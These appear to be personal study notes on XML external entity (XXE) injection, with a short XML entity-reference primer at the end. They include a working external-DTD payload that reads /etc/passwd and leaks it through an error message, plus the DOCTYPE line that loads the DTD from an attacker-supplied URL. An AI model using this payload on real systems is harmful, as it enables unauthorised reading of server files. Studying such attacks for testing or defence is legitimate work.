Tips:

when using an External DTD. if the data we are exfiltraing are going to be placed into a string.

We'd have to use %xxe;

HTML entity reference

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a7ddf110-ef77-4067-8917-299a9b140cfe/Untitled.png

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

Note above piece of XML code is going to be placed inside of 'YOUR-DTD-URL' <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]> . so its already inside of a Double-Quote String.

inside the string, we must use % to specifiy the var. Kind of like $(var) in Bash.

XML Introduction

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/dd009702-2f1d-48e5-a0b3-4d7a52e9a605/Untitled.png

XML Entity References.

Some characters have a special meaning in XML.

If you place a character like "<" inside an XML element, it will generate an error because the parser interprets it as the start of a new element.

This will generate an XML error:

<message>salary < 1000</message>